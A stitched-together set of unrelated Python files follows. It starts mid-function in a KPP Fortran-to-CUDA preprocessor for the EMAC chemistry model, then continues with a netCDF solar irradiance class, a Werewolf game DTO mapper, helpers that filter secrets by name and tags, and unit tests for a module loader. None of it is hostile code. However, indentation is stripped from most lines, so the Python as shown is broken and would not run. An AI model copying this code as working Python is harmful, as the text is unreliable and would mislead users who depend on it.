for i in range(len(source)):
if " "+prefix+"_" in source[i]:
the_line = i
break
ind_s = []
for i in range(the_line,len(source)):
source[i] = source[i].strip()
if prefix+"_" not in source[i] and source[i] != "":
break
if prefix+"_" in source[i]:
ind_s.append(source[i])
for i in range(len(ind_s)):
        ind_s[i] = ind_s[i][ind_s[i].find("::")+2:].strip().replace("=","")
        ind_s[i] = re.sub(r"\s+", " ", ind_s[i])  # collapse whitespace so "name value" splits cleanly
name,value = ind_s[i].split(" ")
ind_s[i] = "#define "+name+" "+str(int(value)-1)+"\n"
return ind_s
def generate_define_vars(file_in,var_names):
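    # Look up the named constants in the Fortran source and emit matching
    # "#define NAME value" lines, dropping Fortran kind suffixes such as _dp.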
file_in.seek(0)
source = file_in.readlines()
source = remove_comments(source)
source = strip_and_unroll_lines(source)
out = []
for line in source:
if var_names == []:
break
for var_name in var_names:
if var_name in line and "=" in line:
var = line[line.find("::")+2:].strip()
name,value = var.split("=")
name = name.strip()
value = value.strip().replace("_dp","").replace("_DP","").replace("_Dp","")
if "real" in line.lower():
value = float(value)
elif "integer" in line.lower():
value = int(value)
else:
value = int(value)
out.append("#define "+name+" "+str(value)+"\n")
var_names.remove(var_name)
if var_names != []:
print("Warning: variables "+str(var_names)+" were not found")
return out
#
# Takes prefix of variables as input and the file
# Returns definitions using index
#
def generate_definitions_global(file_in,var_prefix):
file_in.seek(0)
source = file_in.readlines()
source = remove_comments(source)
source = strip_and_unroll_lines(source)
out = []
for var_name in var_prefix:
for line in source:
# ignore some definitions that are not double
if "INTEGER" in line:
continue
# we reached after the definitions
if "interface" in line:
break
allvars = re.findall(r'(' + var_name + '(\w+)(\s+)?)=\s+(([0-9,E,\-,.])+(\s+)?)[,&,\n]',line)
if ( len(allvars) > 0):
for definition in allvars:
out.append("#define "+definition[0]+" ("+str(definition[3])+")\n")
return out
pass
#########################################################################################################
#########################################################################################################
def gen_kpp_integrate_cuda(file_prototype, source_cuda, inject_rconst):
file_prototype.seek(0)
lines_prototype = file_prototype.readlines()
file_out = open(smcl + "messy_mecca_kpp_acc.cu","w")
for line in lines_prototype:
if "=#=#=#=#=#=#=#=#=#=#=" in line:
chunk_name = line.replace("=#=#=#=#=#=#=#=#=#=#=","").replace("=#=#=#=#=#=#=#=#=#=#=","").strip().lower()
chunk = source_cuda[chunk_name]
if chunk is not None:
for chunk_line in chunk:
chunk_line = remove_precision_qualifiers(chunk_line)
file_out.write(chunk_line)
else:
if ( inject_rconst is True ):
line = line.replace("Jac_sp(var, fix, rconst, jac0, Njac, VL_GLO)","update_rconst(var, khet_st, khet_tr, jx, VL_GLO); \n Jac_sp(var, fix, rconst, jac0, Njac, VL_GLO)")
line = line.replace("Fun(varNew, fix, rconst, varNew, Nfun,VL_GLO);","update_rconst(var, khet_st, khet_tr, jx, VL_GLO); \n Fun(varNew, fix, rconst, varNew, Nfun,VL_GLO);")
line = line.replace("Fun(var, fix, rconst, Fcn0, Nfun, VL_GLO);","update_rconst(var, khet_st, khet_tr, jx, VL_GLO); \n Fun(var, fix, rconst, Fcn0, Nfun, VL_GLO);")
line = line.replace("Fun(var, fix, rconst, dFdT, Nfun, VL_GLO);","update_rconst(var, khet_st, khet_tr, jx, VL_GLO); \n Fun(var, fix, rconst, dFdT, Nfun, VL_GLO);")
file_out.write(line)
file_out.close()
pass
#########################################################################################################
#########################################################################################################
def generate_define_NBSIZE(source):
lines = source[:]
lines = remove_comments(lines)
lines = strip_and_unroll_lines(lines)
nbsize = ""
for line in lines:
if ":: b(" in line.lower():
index = line.lower().find(":: b(")+5
nbsize = "#define NBSIZE "+line[index:line.find(")",index)].strip()
break
return nbsize
pass
#########################################################################################################
#########################################################################################################
def remove_precision_qualifiers(line):
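    # Strip Fortran kind suffixes (_sp/_dp/_qp) from numeric literals such as
    # 33._dp or 33.33E-33_dp, while leaving identifiers that merely end in the
    # suffix (e.g. a_333_dp) untouched.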
operators = "*/+-<>=.,"
var_name = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_'
precision_qualifiers = ["_sp","_dp","_qp"]
truth_mat = []
for qual in precision_qualifiers:
truth_mat.append((qual in line.lower())*1)
if any(truth_mat):
for truth_id in range(len(truth_mat)):
qual = 0
if truth_mat[truth_id]:
qual = precision_qualifiers[truth_id]
index = len(line)
while True:
index = line.rfind(qual,0, index-1)
if index == -1:
break
left = line[:index]
right = line[index:]
#if left[-3:].lower() in precision_qualifiers: # if it's 33._dp, 33.33E-33_dp or a_333_dp
number = 0
if left[-1] == ".": # if it's 33._dp
number = 1
elif left[-1] in var_name: # if it's 33.33E-33_dp or a_333_dp
pos=0
scientif = False
isnumber = True
for i in reversed(left[:]):
if i not in string.digits+".":
if (i in "+-") and abs(pos-2)<=len(left) and (left[pos-2].lower() == "e"):
scientif = True
elif scientif and i.lower() == "e":
pass
elif i in string.ascii_letters+"_": # if it's a_333_dp
pos=0
for i in reversed(left[:]):
if i not in var_name:
break
pos = pos - 1
isnumber = False
break
else:
break
pos = pos - 1
number = not ((not isnumber) and (not scientif))
line = left + (not number)*right[:3] + right[3:]
return line
pass
#########################################################################################################
#########################################################################################################
def generate_c2f_interface(file_in):
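    # Rewrite messy_mecca_kpp.f90, replacing the original kpp_integrate
    # subroutine with a wrapper that calls the generated kpp_integrate_cuda driver.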
file_in.seek(0)
source = file_in.readlines()
start = -1
stop = -1
for i in range(len(source)):
if 'subroutinekpp_integrate' in source[i].lower().replace(" ",""):
if start == -1:
start = i
elif "end" in source[i].lower().replace(" ",""):
stop = i
break
else:
print("Something went wrong in generate c2f_interface")
return
file_out = open(smcl + "messy_mecca_kpp.f90","w")
for i in range(start):
file_out.write(source[i])
out = "SUBROUTINE kpp_integrate (time_step_len,Conc,ierrf,xNacc,xNrej,istatus,l_debug,PE) \n\
\n\
IMPLICIT NONE \n\
\n\
REAL(dp),INTENT(IN) :: time_step_len \n\
REAL(dp),INTENT(INOUT),dimension(:,:) :: Conc \n\
INTEGER, INTENT(OUT),OPTIONAL :: ierrf(:) \n\
INTEGER, INTENT(OUT),OPTIONAL :: xNacc(:) \n\
INTEGER, INTENT(OUT),OPTIONAL :: xNrej(:) \n\
INTEGER, INTENT(INOUT),OPTIONAL :: istatus(:) \n\
INTEGER, INTENT(IN),OPTIONAL :: PE \n\
LOGICAL, INTENT(IN),OPTIONAL :: l_debug \n\
\n\
integer, save :: counter = 0 ! For debuging\n\
integer, save :: newcounter = 0 ! For debuging\n\
\n\
\n\
INTEGER :: k ! loop variable \n\
REAL(dp) :: dt \n\
REAL(dp) :: roundoff\n\
integer,dimension(:),allocatable :: xNacc_u, xNrej_u, ierr_u2\n\
integer :: ierr_u \n\
integer :: i\n\
integer :: j\n\
integer :: istep\n\
integer,dimension(20) :: istatus_u \n\
integer,dimension(5) :: sizes\n\
\n\
LOGICAL :: file_exists\n\
\n\
character(len=10) :: filename\n\
CHARACTER(LEN=3000) :: rowfmt\n\
\n\
if (present (istatus)) istatus = 0 \n\
\n\
\n\
allocate(xNacc_u(VL_GLO))\n\
allocate(xNrej_u(VL_GLO))\n\
allocate(ierr_u2(VL_GLO))\n\
\n\
\n\
sizes(1) = VL_glo\n\
sizes(2) = size(khet_st,2)\n\
sizes(3) = size(khet_tr,2)\n\
sizes(4) = size(jx,2)\n\
roundoff = WLAMCH('E')\n\
\n\
\n\
#if 1\n\
\n\
CALL kpp_integrate_cuda(PE, sizes, time_step_len, Conc, temp, press, cair, &\n\
khet_st, khet_tr, jx, aTol, rTol, ierr_u2, istatus_u, xNacc_u, xNrej_u, roundoff, icntrl, rcntrl)\n\
\n\
DO k=1,VL_glo,VL_DIM \n\
is = k \n\
ie = min(k+VL_DIM-1,VL_glo) \n\
vl = ie-is+1 \n\
\n\
! Return Diagnostic Information \n\
\n\
if(Present(ierrf)) ierrf(is) = IERR_U \n\
if(Present(xNacc)) xNacc(is) = istatus_u(4) \n\
if(Present(xNrej)) xNrej(is) = istatus_u(5) \n\
\n\
if (present (istatus)) then \n\
istatus(1:8) = istatus(1:8) + istatus_u(1:8) \n\
end if \n\
\n\
END DO \n\
\n\
#endif\n\
\n\
#if 0\n\
\n\
DO k=1,VL_glo,VL_DIM \n\
is = k \n\
ie = min(k+VL_DIM-1,VL_glo) \n\
vl = ie-is+1 \n\
\n\
C(:) = Conc(is,:) \n\
\n\
CALL update_rconst \n\
\n\
dt = time_step_len \n\
\n\
! integrate from t=0 to t=dt \n\
CALL integrate(0._dp,dt,icntrl,rcntrl,istatus_u = istatus_u,ierr_u=ierr_u)\n\
\n\
\n\
IF (PRESENT(l_debug) .AND. PRESENT(PE)) THEN \n\
IF (l_debug) CALL error_output(Conc(is,:),ierr_u,PE) \n\
ENDIF \n\
Conc(is,:) = C(:) \n\
\n\
if(Present(ierrf)) ierrf(is) = IERR_U \n\
if(Present(xNacc)) xNacc(is) = istatus_u(4) \n\
if(Present(xNrej)) xNrej(is) = istatus_u(5) \n\
\n\
if (present (istatus)) then \n\
istatus(1:8) = istatus(1:8) + istatus_u(1:8) \n\
end if \n\
\n\
END DO \n\
#endif\n\
\n\
! Deallocate input arrays \n\
\n\
if (allocated(TEMP)) deallocate(TEMP) \n\
if (allocated(cair)) deallocate(cair) \n\
if (allocated(press)) deallocate(press) \n\
if (allocated(temp_ion)) deallocate(temp_ion) \n\
if (allocated(temp_elec)) deallocate(temp_elec) \n\
if (allocated(xaer)) deallocate(xaer) \n\
if (allocated(cvfac)) deallocate(cvfac) \n\
if (allocated(lwc)) deallocate(lwc) \n\
if (allocated(k_exf)) deallocate(k_exf) \n\
if (allocated(k_exb)) deallocate(k_exb) \n\
if (allocated(k_exf_N2O5)) deallocate(k_exf_N2O5) \n\
if (allocated(k_exf_ClNO3)) deallocate(k_exf_ClNO3) \n\
if (allocated(k_exf_BrNO3)) deallocate(k_exf_BrNO3) \n\
if (allocated(jx)) deallocate(jx) \n\
if (allocated(khet_Tr)) deallocate(khet_Tr) \n\
if (allocated(khet_St)) deallocate(khet_St) \n\
if (allocated(mcexp)) deallocate(mcexp) \n\
\n\
deallocate(xNacc_u)\n\
deallocate(xNrej_u)\n\
deallocate(ierr_u2) \n\
data_loaded = .false. \n\
\n\
return \n\
END SUBROUTINE kpp_integrate\n"
file_out.write(out)
for i in range(stop+1,len(source)):
file_out.write(source[i])
pass
#########################################################################################################
#########################################################################################################
def add_cuda_compilation(file_specific,file_makefile,arch):
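    # Append an nvcc compilation rule for messy_mecca_kpp_acc.cu to specific.mk
    # and patch Makefile.m so the CUDA object is built and linked into the library.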
file_makefile.seek(0)
out = "\nmessy_mecca_kpp_acc.o: messy_mecca_kpp_acc.cu specific.mk \n\
\tnvcc -v --ptxas-options=-v " + arch +" --ftz=false --prec-div=true --prec-sqrt=true --fmad=false -O3 -g -c $<"
file_specific.write(out)
temp = open('__temp', 'wb')
for line in file_makefile:
if line.startswith('$(LIB): depend $(OBJS)'):
line = line.strip() + ' $(OBJSCUDA)\n'
if line.startswith('\t$(AR) $(ARFLAGS) $(LIB) $(OBJS)'):
line = line.rstrip() + ' $(OBJSCUDA)\n'
if line.startswith('depend $(MAKEFILE_INC): $(SRCS)'):
line = line.rstrip() + ' $(ACC_SRCS)\n'
if line.startswith('OBJS := $(SRCS:.f90=.o)'):
line ='OBJSCUDA := $(SRCS_ACC:.cu=.o)\n' + line
if line.startswith('SRCS := $(filter-out F%.f90, $(SRCS0)'):
line ='SRCS_ACC := $(wildcard *.cu) \n' + line
if line.startswith('.SUFFIXES: $(SUFFIXES) .f90 .md5'):
line ='.SUFFIXES: $(SUFFIXES) .f90 .md5 .cu\n'
temp.write(line.encode())
temp.close()
os.rename('__temp', smcl + "Makefile.m")
pass
#########################################################################################################
#########################################################################################################
# Based on the input files, select the proper flags
def get_transformation_flags():
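    # Returns four flags describing the KPP output:
    #   multifile     - the mechanism is split across several f90 files
    #   vectorize     - KPP produced the vectorized chemistry (unsupported, the script aborts)
    #   indirect      - the LU decomposition uses indirect (LU_CROW/LU_ICOL) indexing
    #   inject_rconst - the integrator lacks the '! CALL Update_RCONST()' marker, so
    #                   update_rconst() calls must be injected before Fun/Jac_sp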
multifile = False
vectorize = False
indirect = False
inject_rconst = False
# Check if kpp created indirect indexing
if ('LU_CROW(k+1)' in open(smcl + "messy_mecca_kpp.f90").read()) or ('LU_CROW(k+ 1)' in open(smcl + "messy_mecca_kpp.f90").read()):
print("Warning: Can't convert indirect indexing of file.")
print("--> Change the decomp in the conf file or modify the output file.\n")
indirect = True
# Check if kpp created vector length chemistry
if '= C(1:VL,:)' in open(smcl + "messy_mecca_kpp.f90").read():
print("Can't convert vectorized version of file.")
        print("--> Change the rosenbrock_vec to rosenbrock_mz in the conf file.\n")
print("Exiting... \n")
        vectorize = True
exit(-1)
# Check if kpp created the multiple files version.
if ( os.path.isfile(smcl + "messy_mecca_kpp_global.f90") == True and
os.path.isfile(smcl + "messy_mecca_kpp_jacobian.f90") == True
):
print("Multifile version detected!")
multifile = True
if (multifile == True):
file_messy_mecca_kpp = open(smcl + "messy_mecca_kpp_linearalgebra.f90","r")
subroutines = find_subroutines(file_messy_mecca_kpp, ["KppDecomp","KppDecompCmplx"])
infile = " ".join(subroutines["kppdecomp"])
if 'LU_ICOL(kk)' in infile:
print("Multiple files with indirect indexing detected.\n")
indirect = True
if (multifile == True):
file_messy_mecca_kpp = open(smcl + "messy_mecca_kpp_integrator.f90","r")
lines = file_messy_mecca_kpp.readlines()
infile = " ".join(lines)
if '! CALL Update_RCONST()' not in infile:
inject_rconst = True;
else:
file_messy_mecca_kpp = open(smcl + "messy_mecca_kpp.f90","r")
lines = file_messy_mecca_kpp.readlines()
infile = " ".join(lines)
if '! CALL Update_RCONST()' not in infile:
inject_rconst = True;
return multifile, vectorize, indirect, inject_rconst
pass
#########################################################################################################
#########################################################################################################
def print_warning():
print('\033[1m' + "\n####################################################################################################")
print("## WARNING!! BETA VERSION ! PLEASE REPORT TO PACKAGE MAINTAINERS ANY BUGS OR UNEXPECTED BEHAVIOUR.")
print("####################################################################################################\n")
print('\033[0m')
pass
#########################################################################################################
#########################################################################################################
def select_architecture(ans):
if ans=="1":
arch = "--gpu-architecture=compute_20 -maxrregcount=128 "
elif ans=="2":
arch = "--gpu-architecture=compute_35"
elif ans=="3":
arch = "--gpu-architecture=compute_50"
elif ans=="4":
arch = "--gpu-architecture=compute_60"
elif ans=="5":
arch = "--gpu-architecture=compute_70"
else:
arch = "--gpu-architecture=compute_20"
return arch
def print_menu_make_selection(ros,gpu):
if gpu is None:
print ("""
Select CUDA architecture (1-5):
1. CUDA 2.0 ( FERMI GPU architecture )
2. CUDA 3.5 ( KEPLER GPU architecture )
3. CUDA 5.2 ( MAXWELL GPU architecture )
4. CUDA 6.0 ( PASCAL GPU architecture )
5. CUDA 7.0 ( VOLTA GPU architecture )
""")
gpu = input("Option (Default 1): ")
arch = select_architecture(gpu)
if ros is None:
print ("""
Select Rosenbrock solver (1-6):
1. All ( Selects based on the runtime option )
2. Ros2 ( 2-stage L-stable - FASTEST )
3. Ros3 ( 3-stage L-stable - RECOMMENDED )
4. Ros4 ( 4-stage L-stable )
5. Rodas3 ( 4-stage stiffly accurate )
6. Rodas4 ( 6-stage stiffly accurate - SLOWEST )
""")
ros = input("Option (Default 1): ")
if ros not in ['1','2','3','4','5','6']:
ros = "0"
print("Selected options: " + arch + " with ros: " + ros + "\n")
return ros,arch
#########################################################################################################
#########################################################################################################
##
## Main program
##
#########################################################################################################
#########################################################################################################
# Set variables for checking
multifile = False
vectorize = False
indirect = False
inject_rconst = False
###############################################
# check if we have the arguments
parser = argparse.ArgumentParser(description='MEDINA: FORTRAN to CUDA KPP for EMAC Preprocessor.')
parser.add_argument('-r', '--ros', help='An integer value of the Rosenbrock solver produced [1: all (selected at runtime), 2: Ros2, 3: Ros3, 4: Ros4, 5: Rodas3, 6: Rodas4]')
parser.add_argument('-g', '--gpu', help='An integer value of the architecture [1: FERMI, 2: KEPLER, 3: MAXWELL, 4: PASCAL, 5: VOLTA]')
parser.add_argument('-s', '--smcl', help='smcl folder location, default: "../../smcl/"')
args = parser.parse_args()
if args.smcl:
    smcl = args.smcl
else:
    smcl = "../../smcl/"
ros = args.ros
gpu = args.gpu
# get the options for the architecture and the rosenbrock kernel
ros,arch = print_menu_make_selection(ros,gpu)
###############################################
# Print generic information - header
print("\n+===================================================================+ ")
print("| KPP Fortran to CUDA parser - Copyright 2016 The Cyprus Institute |")
print("+===================================================================+ \n")
print_warning()
# First check if the files exist
# In the future, we will check also the path of the binary
if ( os.path.isfile(smcl + "messy_mecca_kpp.f90") == False or
os.path.isfile(smcl + "messy_cmn_photol_mem.f90") == False or
os.path.isfile(smcl + "messy_main_constants_mem.f90") == False or
os.path.isfile("./source/kpp_integrate_cuda_prototype.cu") == False or
os.path.isfile(smcl + "specific.mk") == False or
os.path.isfile(smcl + "Makefile.m") == False
):
print("Can't find one or more files. \n")
    print("--> Run the script from the ./messy/util directory of MESSy. \n")
print("Exiting... \n")
exit(-1)
multifile, vectorize, indirect, inject_rconst = get_transformation_flags()
###############################################
### Backup files
print("==> Step 0: Backup files.\n")
shutil.copyfile(smcl + "specific.mk", smcl + "specific.mk.old")
shutil.copyfile(smcl + "Makefile.m", smcl + "Makefile.m.old")
shutil.copyfile(smcl + "messy_mecca_kpp.f90", smcl + "messy_mecca_kpp.f90.old")
os.remove(smcl + "messy_mecca_kpp.f90")
# Open the files
file_messy_mecca_kpp = open(smcl + "messy_mecca_kpp.f90.old","r")
file_messy_cmn_photol_mem = open(smcl + "messy_cmn_photol_mem.f90","r")
file_messy_main_constants_mem = open(smcl + "messy_main_constants_mem.f90","r")
file_prototype = open("./source/kpp_integrate_cuda_prototype.cu","r")
file_specific = open(smcl + "specific.mk","a")
file_makefile = open(smcl + "Makefile.m","r+")
###############################################
print("==> Step 1: Detect subroutines in the file.")
subroutine_names = ["ros_PrepareMatrix","kppSolve","kppDecomp","Jac_sp","Fun","update_rconst","Initialize"]
subroutines = {}
source_cuda = {}
# if multiple files then we have to extract the functions from multiple files
if (multifile == True):
file_messy = open("messy_mecca_kpp_linearalgebra.f90","r")
subroutines1 = find_subroutines(file_messy, ["KppSolve","kppDecomp"])
file_messy = open("messy_mecca_kpp_integrator.f90","r")
subroutines2 = find_subroutines(file_messy, ["ros_PrepareMatrix"])
file_messy = open("messy_mecca_kpp_jacobian.f90","r")
subroutines3 = find_subroutines(file_messy, ["Jac_SP"])
file_messy = open("messy_mecca_kpp_function.f90","r")
subroutines4 = find_subroutines(file_messy, ["Fun"])
file_messy = open("messy_mecca_kpp_rates.f90","r")
subroutines5 = find_subroutines(file_messy, ["Update_RCONST"])
file_messy = open("messy_mecca_kpp_initialize.f90","r")
subroutines6 = find_subroutines(file_messy, ["Initialize"])
subroutines = dict( list(subroutines1.items()) + list(subroutines2.items()) + list(subroutines3.items()) + list(subroutines4.items()) + list(subroutines5.items()) + list(subroutines6.items()) )
else:
subroutines = find_subroutines(file_messy_mecca_kpp, subroutine_names)
###############################################
print("\n==> Step 2: Replacing variables.")
source_cuda["defines_vars_1"] = generate_define_vars(file_messy_main_constants_mem,["R_gas","atm2Pa","N_A"])
source_cuda["defines_ind_1"] = generate_define_indices_one_line(file_messy_cmn_photol_mem,"ip")
if (multifile == True):
file_messy_mecca_kpp_global = open("messy_mecca_kpp_global.f90","r")
file_messy_mecca_kpp_parameters = open("messy_mecca_kpp_parameters.f90","r")
source_cuda["defines_vars_2"] = generate_define_vars(file_messy_mecca_kpp_parameters,["NSPEC","NVAR","NFIX","NREACT","LU_NONZERO","NBSIZE"])
source_cuda["defines_vars_2"].append(generate_define_NBSIZE(subroutines["jac_sp"]))
source_cuda["defines_ind_2"] = generate_define_indices_many_lines(file_messy_mecca_kpp_parameters,"ind")
source_cuda["defines_ind_3"] = generate_define_indices_one_line(file_messy_mecca_kpp_global,"ihs")
source_cuda["defines_ind_4"] = generate_define_indices_one_line(file_messy_mecca_kpp_global,"iht")
source_cuda["defines_ind_5"] = generate_definitions_global(file_messy_mecca_kpp_global ,["k_","f_","a_"])
else:
source_cuda["defines_vars_2"] = generate_define_vars(file_messy_mecca_kpp,["NSPEC","NVAR","NFIX","NREACT","LU_NONZERO","NBSIZE"])
source_cuda["defines_vars_2"].append(generate_define_NBSIZE(subroutines["jac_sp"]))
source_cuda["defines_ind_2"] = generate_define_indices_many_lines(file_messy_mecca_kpp,"ind")
source_cuda["defines_ind_3"] = generate_define_indices_one_line(file_messy_mecca_kpp,"ihs")
source_cuda["defines_ind_4"] = generate_define_indices_one_line(file_messy_mecca_kpp,"iht")
source_cuda["defines_ind_5"] = generate_definitions_global(file_messy_mecca_kpp,["k_","f_","a_"])
# read the values
NSPEC = int(source_cuda["defines_vars_2"][0].split(" ")[2].strip())
NVAR = int(source_cuda["defines_vars_2"][1].split(" ")[2].strip())
NFIX = int(source_cuda["defines_vars_2"][2].split(" ")[2].strip())
NREACT = int(source_cuda["defines_vars_2"][3].split(" ")[2].strip())
LU_NONZERO = int(source_cuda["defines_vars_2"][4].split(" ")[2].strip())
NBSIZE = int(source_cuda["defines_vars_2"][5].split(" ")[2].strip())
# read the tables
if (multifile == True):
file_messy_jacobian = open("messy_mecca_kpp_jacobiansp.f90","r")
lu_diag = find_LU_DIAG(file_messy_jacobian, NVAR)
lu_crow = find_LU_CROW(file_messy_jacobian, NVAR)
lu_icol = find_LU_ICOL(file_messy_jacobian, NVAR)
else:
lu_diag = find_LU_DIAG(file_messy_mecca_kpp, NVAR)
lu_crow = find_LU_CROW(file_messy_mecca_kpp, NVAR)
lu_icol = find_LU_ICOL(file_messy_mecca_kpp, NVAR)
###############################################
print("\n==> Step 3: Parsing function update_rconst.")
source = subroutines['update_rconst']
source = remove_comments(source)
source = strip_and_unroll_lines(source)
source = fix_power_op(source)
source = decapitalize_vars(source,["rconst","jx","khet_st","khet_tr","cair","press","temp","exp","log","max","min"])
# These are fixes with multifile: jx and khet are 2d
if (multifile == True):
for i in range(len(source)):
source[i] = source[i].replace("USE messy_main_constants_mem","")
source[i] = source[i].replace("USE messy_cmn_photol_mem","k = is")
source[i] = source[i].replace("jx(","jx(k,")
source[i] = source[i].replace("khet_st(","khet_st(k,")
source[i] = source[i].replace("khet_tr(","khet_tr(k,")
source = rconst_preprocessor_1(source)
rconst_ops,rconst_decls = split_rconst(source)
flocals = get_rconst_locals(rconst_decls)
source = subroutines['initialize']
source = remove_comments(source)
source = decapitalize_vars(source,["rconst"])
rinit = create_rconst_init(source)
source_cuda["update_rconst"] = generate_update_rconst(rconst_ops,rconst_decls,flocals,rinit)
###############################################
print("\n==> Step 4: Parsing function kppsolve.")
source = subroutines['kppsolve']
source = remove_comments(source)
source = strip_and_unroll_lines(source)
source = fix_power_op(source)
source = split_beta(source,"X(")
source = fix_indices(source,[("X","K","istage"),("JVS","Ghimj")])
source = strip_lines(source)
source_cuda["kppsolve"] = generate_kppsolve(source)
###############################################
print("\n==> Step 5: Parsing function kppdecomp.")
source = subroutines['kppdecomp']
source = remove_comments(source)
source = strip_and_unroll_lines(source)
source = fix_power_op(source)
if ( indirect == True):
source = split_beta(source,"DO k=1,NVAR")
print("Indirect transformation.")
source_cuda["kppdecomp"] = generate_kppDecompIndirect(source,NSPEC,lu_diag,lu_crow,lu_icol)
else:
source = split_beta(source,"W(")
source = fix_indices(source,[("W","W"),("JVS","Ghimj")])
source_cuda["kppdecomp"] = generate_kppDecomp(source,NSPEC,lu_diag,lu_crow,lu_icol)
###############################################
print("\n==> Step 6: Parsing function jac_sp.")
source = subroutines["jac_sp"]
source = remove_comments(source)
source = strip_and_unroll_lines(source)
source = fix_power_op(source)
source = split_beta(source, "B(")
source = fix_indices(source,[("B","B"),("RCT","rconst"),("F","fix"),("V","var"),("JVS","jcb")])
source_cuda["jac_sp"] = generate_jac_sp(source, NBSIZE)
###############################################
print("\n==> Step 7: Parsing function fun.")
source = subroutines["fun"]
source = remove_comments(source)
source = strip_and_unroll_lines(source)
source = fix_power_op(source)
source = split_beta(source, "A(")
source = fix_indices(source,[("A","A"),("RCT","rconst"),("F","fix"),("V","var"),("Vdot","varDot")])
source_cuda["fun"] = generate_fun(source,NREACT)
###############################################
print("\n==> Step 8: Parsing and preparing diagonal.")
source_cuda["ros_preparematrix"] = generate_prepareMatrix(lu_diag)
###############################################
print("\n==> Step 9: Generating customized solver.")
source_cuda["special_ros"] = generate_special_ros(ros,inject_rconst)
###############################################
print("\n==> Step 10: Generating calls to customized solver.")
source_cuda["call_kernel"] = generate_special_ros_caller(ros)
###############################################
print("\n==> Step 11: Generating kpp_integrate_cuda.")
gen_kpp_integrate_cuda(file_prototype, source_cuda, inject_rconst)
###############################################
print("\n==> Step 12: Generating messy_mecca_kpp replacement.")
generate_c2f_interface(file_messy_mecca_kpp)
###############################################
print("\n==> Step 13: Modifying specific.mk and Makefile")
add_cuda_compilation(file_specific,file_makefile,arch)
###############################################
print("\n##################################################################\n")
print("Don't forget to add '-lcudart' to the linking options during configuration.")
print("For example, it can be added to the SPEC_NETCDF_LIB variable:")
print("SPEC_NETCDF_LIB = -L$EBROOTNETCDFMINFORTRAN/lib -lnetcdff -lcudart -lstdc++")
print_warning()
|
#!/usr/bin/env python
#
# Copyright (c) 2013 Paolo Antonelli, Tiziana Cherubini, Graziano Giuliani
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
class asolar:
"""Solar irradiance dataset"""
def __init__(self,datafile):
from netCDF4 import Dataset
import numpy as np
df = Dataset(datafile)
self.frq = np.array(df.variables['FREQ'][:],np.double)
self.irr = np.array(df.variables['IRRADIANCE'][:],np.double)
df.close()
def get(self,f):
import numpy as np
i = np.interp(f,self.frq,self.irr)
return i
#
# Unit test of the above class
#
if ( __name__ == '__main__' ):
import numpy as np
a = asolar('../data/solar_irradiances.nc')
for j in range(1,1000):
f = np.linspace(1550+j, 2550+j+1, 1550)
i = a.get(f)
print(j)
print(f[0],f[1549])
print(i[0],i[1549])
|
from Shared.dtos.GameDto import GameDto;
from Shared.dtos.GameListDto import GameListDto;
from Shared.enums.PlayerTypeEnum import PlayerTypeEnum;
from Werewolf.game.Game import Game;
def GameToDto(game, lastUpdatedUtc, player):
if not game:
return None;
# don't give any messages if there is no last updated date specified
messages = list();
if lastUpdatedUtc:
messages = [m for m in game.Messages\
if m.TimeUtc >= lastUpdatedUtc\
and (not m.ForPlayer or player.Identifier == m.ForPlayer)\
and (not m.ForRole or not player.Role or player.Role.Type == m.ForRole)];
return GameDto(game.Identifier,\
game.HasStarted,\
game.Name,\
messages,\
game.Votes,\
game.Players,\
game.Turn,\
game.TimeOfDay);
def GameToListDto(game):
if not game:
return None;
return GameListDto(game.Identifier,\
game.Name,\
len(game.Players));
|
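# Predicate helpers for filtering secrets. A pattern matches a string when
# every whitespace-separated word of the pattern occurs somewhere in it;
# the helpers below apply that test to a secret's name, description, tag
# keys and tag values. all() matches when any of those fields matches.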
def _matcher(pattern, str):
for word in pattern.split(" "):
if word not in str:
return False
return True
def name(secret, names):
for n in names:
if _matcher(n, secret["name"]):
return True
return False
def description(secret, descriptions):
for d in descriptions:
if _matcher(d, secret["description"]):
return True
return False
def tag_key(secret, tag_keys):
for k in tag_keys:
for tag in secret["tags"]:
if _matcher(k, tag["Key"]):
return True
return False
def tag_value(secret, tag_values):
for v in tag_values:
for tag in secret["tags"]:
if _matcher(v, tag["Value"]):
return True
return False
def all(secret, values):
return (
name(secret, values)
or description(secret, values)
or tag_key(secret, values)
or tag_value(secret, values)
)
|
#!/usr/bin/env python
import bootstrap
import unittest
import time
import nark
class Tests(unittest.TestCase):
def setup(self):
return nark.Assert(), nark.Assets(), nark.Factory()
def test_can_create_instance(self):
t, _, i = self.setup()
t.not_null(i, "Failed to create Factory instance")
def test_can_load_file(self):
t, a, i = self.setup()
path = a.resolve("data", "sample1.py")
fp = open(path, "w")
fp.write("text = \"Hello World\"")
fp.close()
i.load(path)
value = i.prop("text")
t.equals(value, "Hello World", "Failed to read module value")
def test_does_not_update_file_if_not_watching(self):
t, a, i = self.setup()
path = a.resolve("data", "sample1.py")
fp = open(path, "w")
fp.write("text = \"Hello World\"")
fp.close()
time.sleep(0.5)
i.load(path)
value = i.prop("text")
t.equals(value, "Hello World", "Failed to read module value")
time.sleep(0.5)
fp = open(path, "w")
fp.write("text = \"Hello WORLD\"")
fp.close()
value = i.prop("text")
t.equals(value, "Hello World", "Failed to read module value")
def test_can_update_file(self):
t, a, i = self.setup()
path = a.resolve("data", "sample1.py")
fp = open(path, "w")
fp.write("text = \"Hello World\"")
fp.close()
i.load(path)
i.watch(True) # Notice watching now
value = i.prop("text")
t.equals(value, "Hello World", "Failed to read module value")
time.sleep(1.0)
fp = open(path, "w")
fp.write("text = \"Hello WORLD\"")
fp.close()
